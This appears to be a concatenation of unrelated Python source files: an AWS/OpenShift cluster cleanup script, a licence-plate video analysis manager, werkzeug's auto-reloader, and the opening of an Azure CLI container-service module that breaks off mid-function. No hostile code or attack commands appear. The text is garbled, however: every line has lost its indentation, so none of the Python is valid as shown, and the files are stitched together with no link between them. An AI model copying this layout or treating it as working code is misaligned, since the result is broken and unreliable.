parent_obj = self._get_object_by_path(parent_path, fail_on_missing=False)
prop_name = split[-1]
return parent_obj, prop_name
@staticmethod
def _raise_illegal(prop_path):
raise RuntimeError('illegal path: {0}'.format(prop_path))
def _get_unused_port():
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
_, port = sock.getsockname()
sock.close()
return port
|
cleanup.py | import tempfile
import argparse
import logging
import datetime
import threading
import os
import re
from botocore.exceptions import ClientError
from ocs_ci.framework import config
from ocs_ci.ocs.constants import CLEANUP_YAML, TEMPLATE_CLEANUP_DIR
from ocs_ci.utility.utils import get_openshift_installer, destroy_cluster
from ocs_ci.utility import templating
from ocs_ci.utility.aws import (
AWS, terminate_rhel_workers, destroy_volumes, get_rhel_worker_instances
)
from ocs_ci.cleanup.aws import defaults
FORMAT = (
'%(asctime)s - %(threadName)s - %(name)s - %(levelname)s - %(message)s'
)
logging.basicConfig(format=FORMAT, level=logging.DEBUG)
logger = logging.getLogger(__name__)
def cleanup(cluster_name, cluster_id, upi=False):
"""
Cleanup existing cluster in AWS
Args:
cluster_name (str): Name of the cluster
cluster_id (str): Cluster id to cleanup
upi (bool): True for UPI cluster, False otherwise
"""
data = {'cluster_name': cluster_name, 'cluster_id': cluster_id}
template = templating.Templating(base_path=TEMPLATE_CLEANUP_DIR)
cleanup_template = template.render_template(CLEANUP_YAML, data)
cleanup_path = tempfile.mkdtemp(prefix='cleanup_')
cleanup_file = os.path.join(cleanup_path, 'metadata.json')
with open(cleanup_file, "w") as temp:
temp.write(cleanup_template)
bin_dir = os.path.expanduser(config.RUN['bin_dir'])
oc_bin = os.path.join(bin_dir, "openshift-install")
if upi:
aws = AWS()
rhel_workers = get_rhel_worker_instances(cleanup_path)
logger.info(f"{cluster_name}'s RHEL workers: {rhel_workers}")
if rhel_workers:
terminate_rhel_workers(rhel_workers)
# Destroy extra volumes
destroy_volumes(cluster_name)
stack_names = list()
# Get master, bootstrap and security group stacks
for stack_type in ['ma', 'bs', 'sg']:
try:
stack_names.append(
aws.get_cloudformation_stacks(
pattern=f"{cluster_name}-{stack_type}"
)[0]['StackName']
)
except ClientError:
continue
# Get the worker stacks
worker_index = 0
worker_stack_exists = True
while worker_stack_exists:
try:
stack_names.append(
aws.get_cloudformation_stacks(
pattern=f"{cluster_name}-no{worker_index}"
)[0]['StackName']
)
worker_index += 1
except ClientError:
worker_stack_exists = False
logger.info(f"Deleting stacks: {stack_names}")
aws.delete_cloudformation_stacks(stack_names)
# Destroy the cluster
logger.info(f"cleaning up {cluster_id}")
destroy_cluster(installer=oc_bin, cluster_path=cleanup_path)
for stack_type in ['inf', 'vpc']:
try:
stack_names.append(
aws.get_cloudformation_stacks(
pattern=f"{cluster_name}-{stack_type}"
)[0]['StackName']
)
except ClientError:
continue
aws.delete_cloudformation_stacks(stack_names)
else:
logger.info(f"cleaning up {cluster_id}")
destroy_cluster(installer=oc_bin, cluster_path=cleanup_path)
def get_clusters_to_delete(time_to_delete, region_name, prefixes_hours_to_spare):
"""
Get all cluster names that their EC2 instances running time is greater
than the specified time to delete
Args:
time_to_delete (int): The maximum time in seconds that is allowed
for clusters to continue running
region_name (str): The name of the AWS region to delete the resources from
prefixes_hours_to_spare (dict): Dictionaries of the cluster prefixes to spare
along with the maximum time in hours that is allowed for spared
clusters to continue running
Returns:
tuple: List of the cluster names (e.g ebenahar-cluster-gqtd4) to be provided to the
ci-cleanup script and a list of VPCs that are part of cloudformations
"""
def determine_cluster_deletion(ec2_instances, cluster_name):
for instance in ec2_instances:
allowed_running_time = time_to_delete
do_not_delete = False
if instance.state["Name"] == "running":
for prefix, hours in prefixes_hours_to_spare.items():
# case insensitive 'startswith'
if bool(re.match(prefix, cluster_name, re.I)):
if hours == 'never':
do_not_delete = True
else:
allowed_running_time = int(hours) * 60 * 60
break
if do_not_delete:
logger.info(
"%s marked as 'do not delete' and will not be "
"destroyed", cluster_name
)
return False
else:
launch_time = instance.launch_time
current_time = datetime.datetime.now(launch_time.tzinfo)
running_time = current_time - launch_time
logger.info(
f"Instance {[tag['Value'] for tag in instance.tags if tag['Key'] == 'Name'][0]} "
f"(id: {instance.id}) running time is {running_time} hours while the allowed"
f" running time for it is {allowed_running_time/3600} hours"
)
if running_time.seconds > allowed_running_time:
return True
return False
aws = AWS(region_name=region_name)
clusters_to_delete = list()
cloudformation_vpc_names = list()
vpcs = aws.ec2_client.describe_vpcs()['Vpcs']
vpc_ids = [vpc['VpcId'] for vpc in vpcs]
vpc_objs = [aws.ec2_resource.Vpc(vpc_id) for vpc_id in vpc_ids]
for vpc_obj in vpc_objs:
vpc_tags = vpc_obj.tags
cloudformation_vpc_name = [
tag['Value'] for tag in vpc_tags if tag['Key'] == defaults.AWS_CLOUDFORMATION_TAG
]
if cloudformation_vpc_name:
cloudformation_vpc_names.append(cloudformation_vpc_name[0])
continue
vpc_name = [tag['Value'] for tag in vpc_tags if tag['Key'] == 'Name'][0]
cluster_name = vpc_name.strip('-vpc')
vpc_instances = vpc_obj.instances.all()
if not vpc_instances:
clusters_to_delete.append(cluster_name)
continue
# Append to clusters_to_delete if cluster should be deleted
if determine_cluster_deletion(vpc_instances, cluster_name):
clusters_to_delete.append(cluster_name)
# Get all cloudformation based clusters to delete
cf_clusters_to_delete = list()
for vpc_name in cloudformation_vpc_names:
instance_dicts = aws.get_instances_by_name_pattern(f"{vpc_name.strip('-vpc')}*")
ec2_instances = [aws.get_ec2_instance(instance_dict['id']) for instance_dict in instance_dicts]
if not ec2_instances:
continue
cluster_io_tag = None
for instance in ec2_instances:
cluster_io_tag = [
tag['Key'] for tag in instance.tags
if 'kubernetes.io/cluster' in tag['Key']
]
if cluster_io_tag:
break
if not cluster_io_tag:
logger.warning(
"Unable to find valid cluster IO tag from ec2 instance tags "
"for VPC %s. This is probably not an OCS cluster VPC!",
vpc_name
)
continue
cluster_name = cluster_io_tag[0].replace('kubernetes.io/cluster/', '')
if determine_cluster_deletion(ec2_instances, cluster_name):
cf_clusters_to_delete.append(cluster_name)
return clusters_to_delete, cf_clusters_to_delete
def cluster_cleanup():
parser = argparse.ArgumentParser(description='Cleanup AWS Resource')
parser.add_argument(
'--cluster',
nargs=1,
action='append',
required=True,
help="Cluster name tag"
)
parser.add_argument(
'--upi',
action='store_true',
required=False,
help="For UPI cluster deletion"
)
logging.basicConfig(level=logging.DEBUG)
args = parser.parse_args()
procs = []
for id in args.cluster:
cluster_name = id[0].rsplit('-', 1)[0]
logger.info(f"cleaning up {id[0]}")
proc = threading.Thread(target=cleanup, args=(cluster_name, id[0], args.upi))
proc.start()
procs.append(proc)
for p in procs:
p.join()
def aws_cleanup():
parser = argparse.ArgumentParser(
description='AWS overall resources cleanup according to running time'
)
parser.add_argument(
'--hours',
type=hour_valid,
action='store',
required=True,
help="""
Maximum running time of the cluster (in hours).
Clusters older than this will be deleted.
The minimum is 10 hours
"""
)
parser.add_argument(
'--region',
action='store',
required=False,
help="The name of the AWS region to delete the resources from"
)
parser.add_argument(
'--prefix',
action='append',
required=False,
type=prefix_hour_mapping,
help="""
Additional prefix:hour combo to treat as a special rule.
Clusters starting with this prefix will only be cleaned up if
their runtime exceeds the provided hour(this takes precedence
over the value provided to --hours). Note: if you want to skip
cleanup of a cluster entirely you can use 'never' for the hour.
Example: --prefix foo:24 --prefix bar:48 --prefix foobar:never
"""
)
parser.add_argument(
'--force',
action='store_true',
required=False,
help="""
Force cluster cleanup.
User will not be prompted for confirmation.
WARNING: this utility is destructive, only use this option if
you know what you are doing.
"""
)
args = parser.parse_args()
if not args.force:
confirmation = input(
'Careful! This action could be highly destructive. '
'Are you sure you want to proceed? '
)
assert confirmation == defaults.CONFIRMATION_ANSWER, (
"Wrong confirmation answer. Exiting"
)
prefixes_hours_to_spare = defaults.CLUSTER_PREFIXES_SPECIAL_RULES
if args.prefix:
for prefix, hours in args.prefix:
logger.info(
"Adding special rule for prefix '%s' with hours %s",
prefix, hours
)
prefixes_hours_to_spare.update({prefix: hours})
time_to_delete = args.hours * 60 * 60
region = defaults.AWS_REGION if not args.region else args.region
clusters_to_delete, cf_clusters_to_delete = (
get_clusters_to_delete(
time_to_delete=time_to_delete, region_name=region,
prefixes_hours_to_spare=prefixes_hours_to_spare,
)
)
if not clusters_to_delete:
logger.info("No clusters to delete")
else:
logger.info("Deleting clusters: %s", clusters_to_delete)
get_openshift_installer()
procs = []
for cluster in clusters_to_delete:
cluster_name = cluster.rsplit('-', 1)[0]
logger.info(f"Deleting cluster {cluster_name}")
proc = threading.Thread(target=cleanup, args=(cluster_name, cluster))
proc.start()
procs.append(proc)
for p in procs:
p.join()
for cluster in cf_clusters_to_delete:
cluster_name = cluster.rsplit('-', 1)[0]
logger.info(f"Deleting UPI cluster {cluster_name}")
proc = threading.Thread(target=cleanup, args=(cluster_name, cluster, True))
proc.start()
procs.append(proc)
for p in procs:
p.join()
def prefix_hour_mapping(string):
"""
Validate that the string provided to --prefix is properly formatted
Args:
string (str): input provided to --prefix
Raises:
argparse.ArgumentTypeError: if the provided string is not
correctly formatted
Returns:
str, str: prefix, hours
"""
msg = (
f'{string} is not a properly formatted prefix:hour combination. '
f'See the --help for more information.'
)
try:
prefix, hours = string.split(':')
if not prefix or not hours:
raise argparse.ArgumentTypeError(msg)
# 'never' should be the only non-int value for hours
if hours != 'never':
int(hours)
except ValueError:
raise argparse.ArgumentTypeError(msg)
return prefix, hours
def hour_valid(string):
"""
Validate that the hour value provided is an int and not lower than the
minimum allowed running time
Args:
string: input provided to --hours
Raises:
argparse.ArgumentTypeError: if the provided hours value is not an int
or lower than the minimum allowed running time
Returns:
int: valid hour value
"""
try:
hours = int(string)
assert hours >= defaults.MINIMUM_CLUSTER_RUNNING_TIME
except ValueError:
msg = f'{string} is not an int, please provide an int value'
raise argparse.ArgumentTypeError(msg)
except AssertionError:
msg = (
f"Number of hours ({hours}) is lower than the required minimum "
f"({defaults.MINIMUM_CLUSTER_RUNNING_TIME})."
)
raise argparse.ArgumentTypeError(msg)
return hours
|
Manager.py | import logging
import sys
import threading
from concurrent.futures.process import ProcessPoolExecutor
from concurrent.futures.thread import ThreadPoolExecutor
from rx import create, operators as ops
from rx.subject import Subject
from core.actorClasses.imageAnalyse import ImageAnalyseMock, ImageAnalyse
from core.actorClasses.imageProcessing import ImageProcessingMock, ImageProcessing
from core.actorClasses.outputGenerator import OutputGenerator
from core.dataClasses.frame import Frame
import click
def singleton(class_):
"""
decorator used as a form of singleton design pattern implementation
:param class_:
:return:
"""
instances = {}
def get_instance(*args, **kwargs):
if class_ not in instances:
instances[class_] = class_(*args, **kwargs)
return instances[class_]
return get_instance
@singleton
class Manager:
def __init__(self, _config):
"""
default constructor for Manager class
:param _config: dictionary containing current configuration (from a *config.toml file)
"""
self._debug = _config['debug']
self._mock = _config['mock']
self._nth_analysed = _config['manager']['nth_analysed']
self._video_input_path = _config['input']['video_input_path']
# logger declaration
self.log = logging.getLogger(__name__)
ch = logging.StreamHandler(stream=sys.stdout)
if self._debug == 1:
self.log.setLevel(logging.DEBUG)
else:
self.log.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s|%(threadName)s|%(name)s|%(lineno)d|%(levelname)s|%(message)s',
datefmt='%H:%M:%S')
ch.setFormatter(formatter)
self.log.addHandler(ch)
# end of logger declaration
self._max_workers = _config['manager']['max_workers']
self._executor = ThreadPoolExecutor(max_workers=self._max_workers)
self._futures = []
self._show_futures_status = _config['logging']['show_futures_status']
self._log_file_path = _config['output']['log_file_path']
# Two streams (Subjects) used as communication channels with OutputGenerator
self._analysed_frames = Subject()
self._generate_log_status = Subject()
# status of log generating class instance, currently used only in basic mock test (True=busy)
self._file_generation_status = True
if self._mock == 0:
self._img_processing_class = ImageProcessing
self._img_analyse_class = ImageAnalyse
else:
self.log.warning("MOCK classes are used")
self._img_processing_class = ImageProcessingMock
self._img_analyse_class = ImageAnalyseMock
# self._last_analysed_frame = Frame(-1)
self.log.info('Path to input file: %s', self._video_input_path)
self._are_all_processed = False
def run(self):
"""
method starts image processing, analysis and output generation.
It creates appropriate threads for:
_collect_img_processing: starting processing and collecting images
_generate_log_file: starting generation of output log file
:return:
"""
threading.Thread(target=self._collect_img_processing).start()
threading.Thread(target=self._generate_log_file).start()
def _collect_img_processing(self):
"""
Method creates instance of image processing class.
Handles all incoming Frames, passing it to ThreadPoolExecutor to be analysed.
:return:
"""
_img_processing_instance = self._img_processing_class(self._video_input_path)
_img_processing_source = create(_img_processing_instance.process)
def on_complete_processing():
self.log.info('Img processing has been completed')
self._are_all_processed = True
_img_processing_source.pipe(ops.filter(lambda f: self._filter(f))).subscribe(
on_next=lambda f: self._on_next(f),
on_error=lambda e: self.log.error(e),
on_completed=lambda: on_complete_processing()
)
self._executor.shutdown(wait=True)
self._futures.clear()
self._analysed_frames.on_completed()
def _filter(self, frame: Frame) -> bool:
"""
filtering method is used by incoming processed images stream.
It passes every nth frame to be analysed, to optimise program execution.
Rest of the frames are directly passed to the Output generator instance.
:param frame: Frame: input Frame
:return: boolean: based on frame id_ returns True or False
"""
if frame.id_ % self._nth_analysed == 0:
frame.is_analysed_ = True
return True
# self._last_analysed_frame.id_ = frame.id_
self._analysed_frames.on_next(frame)
return False
def _on_next(self, frame: Frame):
"""
Passes incoming processed image (from ImgProcessing) as Frame to self._executor for analysis.
:param frame: instance of a Frame class
:return:
"""
fut = self._executor.submit(self._img_analyse_class.analyse, frame)
fut.add_done_callback(self._callback)
self._futures.append(fut)
def _callback(self, fn):
"""
callback method is called after each future finishes.
It sends analysed LicencePlate to self._analysed_frames.
It also clears associated future and if specified in config logs frame info.
:param fn: frame returned by _img_analyse_class.analyse
:return:
"""
if fn.cancelled():
self.log.warning('canceled')
self._analysed_frames.on_error(Exception("Job was cancelled"))
elif fn.done():
error = fn.exception()
if error:
self.log.error('error returned: {}'.format(error))
self._analysed_frames.on_error(error)
else:
if self._show_futures_status == 1:
self.log.info('value returned: {}'.format(fn.result()))
self._analysed_frames.on_next(fn.result())
self._futures.remove(fn)
def _generate_log_file(self):
"""
It invokes Output Generation process.
The _generate_log_status is stream (emitter is OutputGenerator) containing status.
_analysed_frames is stream of analysed Frames with [LicensePlates].
:return:
"""
def _switch_status():
self._file_generation_status = False
self.log.info("_file_generation_status set to false")
self._generate_log_status.subscribe(
on_next=lambda m: self.log.info('Output generator status: {}'.format(m)),
on_error=lambda e: self.log.error('Output generator error: {}'.format(e)),
on_completed=lambda: _switch_status(),
)
self._file_generation_status = True
output_gen = OutputGenerator(self._log_file_path, self._analysed_frames, self._generate_log_status)
output_gen.generate_log_file()
def mock(self):
"""
Just for test purposes
:return:
"""
return self._max_workers
def get_status(self):
"""
DEPRECATED
TO BE REMOVED IN FUTURE
:return:
"""
return self._file_generation_status
def get_progress(self) -> float:
"""
Returns number between 0 and 1,
indicating progress file analysing
:return: float: between 0 and 1
"""
if self._are_all_processed:
if self._file_generation_status:
return 0.6
return 0.3
return 0.1
def _raise_exception(self, e: Exception):
raise e
def reset_config(self, video_input_path=None, log_file_path=None):
if video_input_path is not None:
self._video_input_path = video_input_path
if log_file_path is not None:
self._log_file_path = log_file_path
# Two streams (Subjects) used as communication channels with OutputGenerator
self._analysed_frames = Subject()
self._generate_log_status = Subject()
# status of log generating class instance, currently used only in basic mock test (True=busy)
self._file_generation_status = True
self._executor = ThreadPoolExecutor(max_workers=self._max_workers)
self._futures = []
# self._last_analysed_frame = Frame(-1)
self.log.info('Path to input file: %s', self._video_input_path)
self._are_all_processed = False
@click.command()
@click.argument('input_file_path', type=click.Path(exists=True))
@click.argument('output_log_path', type=click.Path(exists=True))
@click.argument('config_path', type=click.Path(exists=True))
def cli_entry(input_file_path, output_log_path, config_path):
import toml
with open(config_path) as file:
config = toml.load(file)
file_name = ''
if '\\' in input_file_path:
file_name = input_file_path.split('\\')[-1]
file_name = '\\' + str(file_name).split('.')[0] + '_log.log'
else:
file_name = input_file_path.split('/')[-1]
file_name = '/' + str(file_name).split('.')[0] + '_log.log'
config['input']['video_input_path'] = input_file_path
config['output']['log_file_path'] = output_log_path + file_name
manager = Manager(config)
manager.run()
if __name__ == '__main__':
import toml
with open("../../config.toml") as file:
config = toml.load(file)
manager = Manager(config)
manager.run()
|
_reloader.py | import os
import sys
import time
import subprocess
import threading
from itertools import chain
from werkzeug._internal import _log
from werkzeug._compat import PY2, iteritems, text_type
def _iter_module_files():
"""This iterates over all relevant Python files. It goes through all
loaded files from modules, all files in folders of already loaded modules
as well as all files reachable through a package.
"""
# The list call is necessary on Python 3 in case the module
# dictionary modifies during iteration.
for module in list(sys.modules.values()):
if module is None:
continue
filename = getattr(module, '__file__', None)
if filename:
old = None
while not os.path.isfile(filename):
old = filename
filename = os.path.dirname(filename)
if filename == old:
break
else:
if filename[-4:] in ('.pyc', '.pyo'):
filename = filename[:-1]
yield filename
def _find_observable_paths(extra_files=None):
"""Finds all paths that should be observed."""
rv = set(os.path.abspath(x) for x in sys.path)
for filename in extra_files or ():
rv.add(os.path.dirname(os.path.abspath(filename)))
for module in list(sys.modules.values()):
fn = getattr(module, '__file__', None)
if fn is None:
continue
fn = os.path.abspath(fn)
rv.add(os.path.dirname(fn))
return _find_common_roots(rv)
def _get_args_for_reloading():
"""Returns the executable. This contains a workaround for windows
if the executable is incorrectly reported to not have the .exe
extension which can cause bugs on reloading.
"""
rv = [sys.executable]
py_script = sys.argv[0]
if os.name == 'nt' and not os.path.exists(py_script) and \
os.path.exists(py_script + '.exe'):
py_script += '.exe'
rv.append(py_script)
rv.extend(sys.argv[1:])
return rv
def _find_common_roots(paths):
"""Out of some paths it finds the common roots that need monitoring."""
paths = [x.split(os.path.sep) for x in paths]
root = {}
for chunks in sorted(paths, key=len, reverse=True):
node = root
for chunk in chunks:
node = node.setdefault(chunk, {})
node.clear()
rv = set()
def _walk(node, path):
for prefix, child in iteritems(node):
_walk(child, path + (prefix,))
if not node:
rv.add('/'.join(path))
_walk(root, ())
return rv
class ReloaderLoop(object):
name = None
# monkeypatched by testsuite. wrapping with `staticmethod` is required in
# case time.sleep has been replaced by a non-c function (e.g. by
# `eventlet.monkey_patch`) before we get here
_sleep = staticmethod(time.sleep)
def __init__(self, extra_files=None, interval=1):
self.extra_files = set(os.path.abspath(x)
for x in extra_files or ())
self.interval = interval
def run(self):
pass
def restart_with_reloader(self):
"""Spawn a new Python interpreter with the same arguments as this one,
but running the reloader thread.
"""
while 1:
_log('info', ' * Restarting with %s' % self.name)
args = _get_args_for_reloading()
new_environ = os.environ.copy()
new_environ['WERKZEUG_RUN_MAIN'] = 'true'
# a weird bug on windows. sometimes unicode strings end up in the
# environment and subprocess.call does not like this, encode them
# to latin1 and continue.
if os.name == 'nt' and PY2:
for key, value in iteritems(new_environ):
if isinstance(value, text_type):
new_environ[key] = value.encode('iso-8859-1')
exit_code = subprocess.call(args, env=new_environ,
close_fds=False)
if exit_code != 3:
return exit_code
def trigger_reload(self, filename):
self.log_reload(filename)
sys.exit(3)
def log_reload(self, filename):
filename = os.path.abspath(filename)
_log('info', ' * Detected change in %r, reloading' % filename)
class StatReloaderLoop(ReloaderLoop):
name = 'stat'
def run(self):
mtimes = {}
while 1:
for filename in chain(_iter_module_files(),
self.extra_files):
try:
mtime = os.stat(filename).st_mtime
except OSError:
continue
old_time = mtimes.get(filename)
if old_time is None:
mtimes[filename] = mtime
continue
elif mtime > old_time:
self.trigger_reload(filename)
self._sleep(self.interval)
class WatchdogReloaderLoop(ReloaderLoop):
def __init__(self, *args, **kwargs):
ReloaderLoop.__init__(self, *args, **kwargs)
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
self.observable_paths = set()
def _check_modification(filename):
if filename in self.extra_files:
self.trigger_reload(filename)
dirname = os.path.dirname(filename)
if dirname.startswith(tuple(self.observable_paths)):
if filename.endswith(('.pyc', '.pyo')):
self.trigger_reload(filename[:-1])
elif filename.endswith('.py'):
self.trigger_reload(filename)
class _CustomHandler(FileSystemEventHandler):
def on_created(self, event):
_check_modification(event.src_path)
def on_modified(self, event):
_check_modification(event.src_path)
def on_moved(self, event):
_check_modification(event.src_path)
_check_modification(event.dest_path)
def on_deleted(self, event):
_check_modification(event.src_path)
reloader_name = Observer.__name__.lower()
if reloader_name.endswith('observer'):
reloader_name = reloader_name[:-8]
reloader_name += ' reloader'
self.name = reloader_name
self.observer_class = Observer
self.event_handler = _CustomHandler()
self.should_reload = False
def trigger_reload(self, filename):
# This is called inside an event handler, which means throwing
# SystemExit has no effect.
# https://github.com/gorakhargosh/watchdog/issues/294
self.should_reload = True
self.log_reload(filename)
def run(self):
watches = {}
observer = self.observer_class()
observer.start()
while not self.should_reload:
to_delete = set(watches)
paths = _find_observable_paths(self.extra_files)
for path in paths:
if path not in watches:
try:
watches[path] = observer.schedule(
self.event_handler, path, recursive=True)
except OSError:
# Clear this path from list of watches We don't want
# the same error message showing again in the next
# iteration.
watches[path] = None
to_delete.discard(path)
for path in to_delete:
watch = watches.pop(path, None)
if watch is not None:
observer.unschedule(watch)
self.observable_paths = paths
self._sleep(self.interval)
sys.exit(3)
reloader_loops = {
'stat': StatReloaderLoop,
'watchdog': WatchdogReloaderLoop,
}
try:
__import__('watchdog.observers')
except ImportError:
reloader_loops['auto'] = reloader_loops['stat']
else:
reloader_loops['auto'] = reloader_loops['watchdog']
def run_with_reloader(main_func, extra_files=None, interval=1,
reloader_type='auto'):
"""Run the given function in an independent python interpreter."""
import signal
reloader = reloader_loops[reloader_type](extra_files, interval)
signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
try:
if os.environ.get('WERKZEUG_RUN_MAIN') == 'true':
t = threading.Thread(target=main_func, args=())
t.setDaemon(True)
t.start()
reloader.run()
else:
sys.exit(reloader.restart_with_reloader())
except KeyboardInterrupt:
pass
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import colorama
import base64
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
import zipfile
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (ResourceNotFoundError,
ClientRequestError,
ArgumentUsageError,
InvalidArgumentValueError,
MutuallyExclusiveArgumentError,
ValidationError,
UnauthorizedError)
from azure.cli.core._profile import Profile
from azure.cli.core.profiles import ResourceType
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_agent_pools
from ._client_factory import get_msi_client
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type,
_parse_comma_separated_list)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import ADDONS
from ._consts import CONST_CANIPULL_IMAGE
from ._consts import CONST_PRIVATE_DNS_ZONE_SYSTEM
from ._consts import CONST_MANAGED_IDENTITY_OPERATOR_ROLE, CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
"""
Opens a browser to the web interface for the cluster orchestrator
:param name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_acs_browse_internal(
cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)
def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
if str(orchestrator_type).lower() == 'kubernetes' or \
orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
(acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member
return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
raise CLIError(
'Unsupported orchestrator type {} for browse'.format(orchestrator_type))
def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Launch a proxy and browse the Kubernetes web UI.
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)
def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
if os.path.exists(browse_path):
os.remove(browse_path)
_k8s_get_credentials_internal(
name, acs_info, browse_path, ssh_key_file, False)
logger.warning('Proxy running on 127.0.0.1:8001/ui')
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1:8001/ui')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])
def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
"""
Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.
:param name: name: Name of the target Azure container service instance.
:type name: String
:param resource_group_name: Name of Azure container service's resource group.
:type resource_group_name: String
:param disable_browser: If true, don't launch a web browser after estabilishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(
_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
